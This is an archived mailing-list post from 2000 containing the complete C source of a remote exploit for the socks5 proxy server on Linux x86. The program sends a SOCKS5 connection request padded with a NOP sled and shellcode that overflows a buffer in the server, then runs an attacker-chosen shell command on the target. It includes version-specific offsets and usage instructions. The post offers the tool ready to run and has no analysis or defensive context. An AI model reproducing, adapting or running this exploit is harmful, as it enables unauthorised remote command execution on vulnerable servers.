OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: socks5 remote exploit / linux x86
From: 0days master (zerodaymasterHOTMAIL.COM)
Date: Wed Nov 15 2000 - 12:15:56 CST


/*
* !!!! Private do not distribute !!!!
*
* <1080r.c> socks5 remote exploit / linux x86
*
* Usage:
* $ ./1080r <host> <command> [offset]
*
* Vulnerables:
* socks5-v1.0r10 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r9 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r8 (compiled on a turbolinux 4.0.5) => 0
* socks5-v1.0r10 (compiled on a redhat 6.0) => 400
* socks5-s5watch-1.0r9-2 (redhat-contrib) => no?
* socks5-0.17-1 (redhat 4.2) => no
* socks5-1.0r10-5 (redhat-contrib) => no??
* socks5-server-1.0r6-8TL (TurboContrib) => no??
*
* By: The Dark Raver of CPNE (Spain - 9/5/2000)
*
* <http://members.tripod.com/~ochodedos> - <dobleiname.com>
*
* "Pasaba arrolladora en su hermosura
* y el paso le dejé,
* ni aun mirarla me volví, y no obstante
* algo en mi oído murmuró, esa es..."
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <arpa/nameser.h>

#define NOP 0x90
#define MAXLEN 2000
#define OFFSET 0x7fffd99d // TurboLinux 4.0.5
#define ALIGN 3
#define LENGTH 195

char hell[100]=
"\xeb\x29" // jmp 0x13
"\x5e" // popl %esi
"\x89\x76\x30" // movl %esi,0x30(%esi)
"\x89\xf0" // movl %esi,%eax
"\x83\xc0\x08" // addl $0x8,%eax
"\x89\x46\x34" // movl %eax,0x34(%esi)
"\x83\xc0\x03" // addl $0x3,%eax
"\x89\x46\x38" // movl %eax,0x38(%esi)
"\x31\xc0" // xorl %eax,%eax
"\x89\x46\x3c" // movl %eax,0x3c(%esi)
"\x88\x46\x07" // movb %eax,0x7(%esi)
"\x88\x46\x0a" // movb %eax,0xa(%esi)
"\xb0\x0b" // movb $0xb,%al
"\x89\xf3" // movl %esi,%ebx
"\x8d\x4e\x30" // leal 0x30(%esi),%ecx
"\x8d\x56\x3c" // leal 0x3c(%esi),%edx
"\xcd\x80" // int $0x80
"\xe8\xd2\xff\xff\xff" // call -0x22
"/bin/shA"
"-cA"
"";

char buf[MAXLEN];

main(int argc, char *argv[]) {
struct sockaddr_in to;
char buff[1000];
int sd;
int pktlen;
struct hostent *hp;
int i;
long *addr;
int off;
int alin;
int len;
int offset;

if(argc==4) {
offset=atoi(argv[3]);
} else {
        if(argc==3) {
        offset=0;
        } else {
                printf("Uso: ./1080r <host> <command> [offset]\n");
                exit(0); }
}

len=LENGTH;
off=OFFSET+offset;
alin=ALIGN;

strcat(hell,argv[2]);
strcat(hell,";");

memset(buf,NOP,len);
memcpy(buf+len-strlen(hell)-4,hell,strlen(hell));

addr=(long *)(buf+alin);
for (i=0;i<46;i+=4)
*(addr++) = off;

buf[len-1]='\0';

to.sin_family=AF_INET;
to.sin_port = htons(1080);

if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
                perror("gethostbyname()");
                exit(0); }

if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
                perror("socket()");
                exit(0); }

memcpy((char *)&to.sin_addr,(char *)hp->h_addr,hp->h_length);

if(connect(sd,(struct sockaddr *)&to,sizeof(to))!=0) {
                perror("connect()");
                exit(0); }
printf("Connect: Ready to send overflow...\n");
//getchar();

// inicio

pktlen=3;
buff[0]=0x5; // SOCKS version 5
buff[1]=0x1; // one authentication type...

buff[2]=0x0; // no authentication
//buff[2]=0x2; // userpass

if(write(sd, buff, pktlen)!=pktlen) {
perror("write error");
exit(-1); }

if(read(sd, buff, 2)!=2) {
      perror("read error");
      exit(-1); }

if(buff[0] != 0x5) {
      printf("invalid response\n");
      exit(-1); }

if(buff[1] == 0xf) {
      printf("proxy requires authenticationn");
      exit(-1); }

if(buff[1] != 0x0) {
      printf("proxy returned an invalid authentication type\n");
      exit(-1); }

// autentificacion
/*
printf("done\n");
printf("sending autentificacion request...");

pktlen=snprintf(buff, sizeof(buff), "\x01%c%s%c%s",
        strlen(username), username, strlen(password), password);

send(sd, buff, pktlen, 0);

recv(sd, buff, 2, 0);

if(buff[1] != 0x00) {
              printf("username/password invalid\n");
              exit (1); }
*/
// conexion

for(i=1;i<=len;i++)
        putchar(buf[i]);

printf("done\n");
printf("sending connection request...");

pktlen=snprintf(buff, sizeof(buff), "\x05\x01%c\x03%c%s%c%c",
         0x00, strlen(buf), buf, 0x11, 0x22);

if(write(sd, buff, pktlen)!=pktlen) {
        perror("write error");
        exit(-1); }

if(read(sd, buff, 4)!=4) {
      perror("read error (1)");
      exit(-1); }

    switch(buff[1]) {
    case 0: printf("succeeded\n"); break;
    case 1: printf("general SOCKS server failure\n"); exit(-1);
    case 2: printf("connection not allowed by ruleset\n"); exit(-1);
    case 3: printf("network unreachable\n"); exit(-1);
    case 4: printf("host unreachable\n"); exit(-1);
    case 5: printf("connection refused\n"); exit(-1);
    case 6: printf("TTL expired\n"); exit(-1);
    case 7: printf("command not supported (?)\n"); exit(-1);
    case 8: printf("address type not supported\n"); exit(-1);
    default: printf("returned unknown error code\n"); exit(-1);
    }

}
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

Share information about yourself, create your own public profile at
http://profiles.msn.com.